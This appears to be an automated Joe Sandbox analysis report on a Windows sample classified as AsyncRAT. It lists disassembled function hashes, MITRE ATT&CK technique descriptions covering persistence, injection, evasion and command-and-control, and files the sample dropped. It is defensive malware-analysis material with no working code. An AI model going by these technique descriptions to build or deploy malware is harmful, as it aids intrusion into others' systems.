Instruction Fuzzy Hash: 42515934B201149FCB44DF69C458A6EBBF6FF88710F2581A9E806DB3A5CE71EC018B94

Uniqueness

Uniqueness Score: -1.00%

Function 05260D20 Relevance: 2.6, Strings: 2, Instructions: 128COMMON

Download Yara Rule

Strings

dLdq, xrefs: 05260D5B
Hbq, xrefs: 05260E40

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID: Hbq$dLdq
API String ID: 0-411705877
Opcode ID: c6d5385a21d948b1e82902c8093c857d5fc715731549e2d44055341ea0fb4c01
Instruction ID: f2b3e81db2ae559b4422c47e77fe839c5f3941605cc9fef2847bc6f2ce605405
Opcode Fuzzy Hash: c6d5385a21d948b1e82902c8093c857d5fc715731549e2d44055341ea0fb4c01
Instruction Fuzzy Hash: E2419D75B102048FDB14DF68D448BAEBBE6FF88201F1485AAE406EB3A1CA75DD45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05261339 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

LR^q, xrefs: 0526138B

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 84a06b4ff5e3130457c4ed0291685decabecddf4921dac2e09117251791be0da
Instruction ID: fb1eaf9b85e24b8eba66e824e037e9c6a6d35a500bc44ffcd5bc03638d66eab9
Opcode Fuzzy Hash: 84a06b4ff5e3130457c4ed0291685decabecddf4921dac2e09117251791be0da
Instruction Fuzzy Hash: F931AC70F102168FCB08EB798554A6FBBF6BFC9201B144069E10ADB3A5EE30DC42C792

Uniqueness

Uniqueness Score: -1.00%

Function 05260D10 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

dLdq, xrefs: 05260D5B

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID: dLdq
API String ID: 0-3390252261
Opcode ID: bcb4d1a376410dec4c35f851ad8b212b79763dfb3493dbf4528322d8ae6867e2
Instruction ID: 5c00ec6bc75c088ab7ad0f2aac751ea98471104649fc5510e80ab238d26a292c
Opcode Fuzzy Hash: bcb4d1a376410dec4c35f851ad8b212b79763dfb3493dbf4528322d8ae6867e2
Instruction Fuzzy Hash: 61315C75A102058FDB14DF68D598BAEBBF2FF48300F14856AE406AB3A1CB75ED44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05260E3F Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

Hbq, xrefs: 05260E40

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: c70a6eae6ade2d4dd6514de69f47541245818ed7ef4cbd0300b0bdacb069017e
Instruction ID: 6f0eb4051666cf1fd368de6d52d254ee9723fa60305883618171b249e0ca1e0d
Opcode Fuzzy Hash: c70a6eae6ade2d4dd6514de69f47541245818ed7ef4cbd0300b0bdacb069017e
Instruction Fuzzy Hash: 93F02B35B141104FC345AB3DA45463F3BD7EFD9212B5548BAE109CB395DE388C068758

Uniqueness

Uniqueness Score: -1.00%

Function 05260AA0 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa5f4babd1608e780c7fcd2698359eb86e7a63d6edf81333671d8f8b84714913
Instruction ID: eb33cda091abf2d207292be17e051dbc8c3735e7fd95a045fc819e2e826ec744
Opcode Fuzzy Hash: fa5f4babd1608e780c7fcd2698359eb86e7a63d6edf81333671d8f8b84714913
Instruction Fuzzy Hash: 2551E830620205DFC725DB28F98955ABB77FF84305751866CD4018B36AEF39A946CF84

Uniqueness

Uniqueness Score: -1.00%

Function 052611D0 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e292174032983fb9db8486cb7858e0cac641a714e40b6d61d0d1933eca0b754f
Instruction ID: eebe1cd0ad6263418ff35ce8a013e683081b3a7904f698c25f362f3f7a1bc4b7
Opcode Fuzzy Hash: e292174032983fb9db8486cb7858e0cac641a714e40b6d61d0d1933eca0b754f
Instruction Fuzzy Hash: F4419271F10209AFCB04DFB9C54466EBBFAEF88300F20C569D449D7345DA349D818B95

Uniqueness

Uniqueness Score: -1.00%

Function 0520D4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2091423601.000000000520D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0520D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_520d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344e1fcda348cf3fe6a6c2d9b7def4a1248f868e2c6562b1c03100d097515443
Instruction ID: a344530bbbb3c3535e07cf2b9868df9c36415c354bbfc75e75573437d6728c8f
Opcode Fuzzy Hash: 344e1fcda348cf3fe6a6c2d9b7def4a1248f868e2c6562b1c03100d097515443
Instruction Fuzzy Hash: 44213371516201DFDB01DF84D9C0F26BF66FF88328F20C169ED0A0A297C376D446CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 05260998 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2010ba63872dfd052c0c512de88e7e1bf0151829cf0fd70b088451f6735ce0b
Instruction ID: 68bd5ea0ab7c75f2d37b23c7b031b2bb779c03f15051d5c8cfda4c8fef4b551c
Opcode Fuzzy Hash: f2010ba63872dfd052c0c512de88e7e1bf0151829cf0fd70b088451f6735ce0b
Instruction Fuzzy Hash: 262162347363038FDB689B75F94D63E3EAABF54681701446DE50BC1180EF748D809B59

Uniqueness

Uniqueness Score: -1.00%

Function 052609A8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 157ed68f58abc49b028eb757a91423349ae54264b8fd16dc531fb694e81976c0
Instruction ID: b3b8750d72c22afaae3f8df02ff0f0b3d5741008a0840cca28fcc3a8ced26cc3
Opcode Fuzzy Hash: 157ed68f58abc49b028eb757a91423349ae54264b8fd16dc531fb694e81976c0
Instruction Fuzzy Hash: 2C2195347322038FDF68AFB4B95D63F7EAABF54681700446DA60BC1180EE748D80EB56

Uniqueness

Uniqueness Score: -1.00%

Function 0520D49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2091423601.000000000520D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0520D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_520d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 4278441507709dad91b1f8353660fea7399df3138182a89e04ef99cb6e7cc968
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 0B11AF76505241CFDB16CF54D5C4B26BF62FB84328F24C5A9DD090B257C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05261431 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a2bbfb956aadff9136c518747c87ccb1207a488c0423c055762dae908c82b1c
Instruction ID: abfc47a4c7bd79450e6570cee319229f459774f9490db806f79a9f543035ff40
Opcode Fuzzy Hash: 7a2bbfb956aadff9136c518747c87ccb1207a488c0423c055762dae908c82b1c
Instruction Fuzzy Hash: 49118E70A20245DFCB54DBB9E948A2A7BF6EF88216711447DE40AD7391EB34DC51CB84

Uniqueness

Uniqueness Score: -1.00%

Function 05261440 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f834b2db07bc4f6887c8f4acc60a9796da147008d79a7566fff7b926ef1fdb6a
Instruction ID: 4257bdb1c67eb553d9a03898b95f2cfd5a95e1dd63776d3bd7fb71952c1f7112
Opcode Fuzzy Hash: f834b2db07bc4f6887c8f4acc60a9796da147008d79a7566fff7b926ef1fdb6a
Instruction Fuzzy Hash: 9D11AD70B10205DFCB54EBB9E944A2A7BFAFF8820571104BDD00ADB391EA35DC91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05260E80 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2100091109.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5260000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec3f414dd05b223458ce625e1fb214646550201634c22ce877cdbf00cc38b529
Instruction ID: b2862562f6a6b3c19c609c2944339dbd0b861e6b68f7da4f4138f8fb8eaf0bc1
Opcode Fuzzy Hash: ec3f414dd05b223458ce625e1fb214646550201634c22ce877cdbf00cc38b529
Instruction Fuzzy Hash: FEE08C323002045F8344962EF88885BBBDAEFC862431448BAF109C7321DD60CC014690

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Gm602axA2d.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: AsyncRAT

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Lxfrfbi.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vulvvmkewji.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Office Installer.exe

C:\Users\user\AppData\Local\Temp\Office Installer.ini

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ay3543wj.qil.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lskegv2z.c5e.psm1

Windows Analysis Report
Gm602axA2d.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre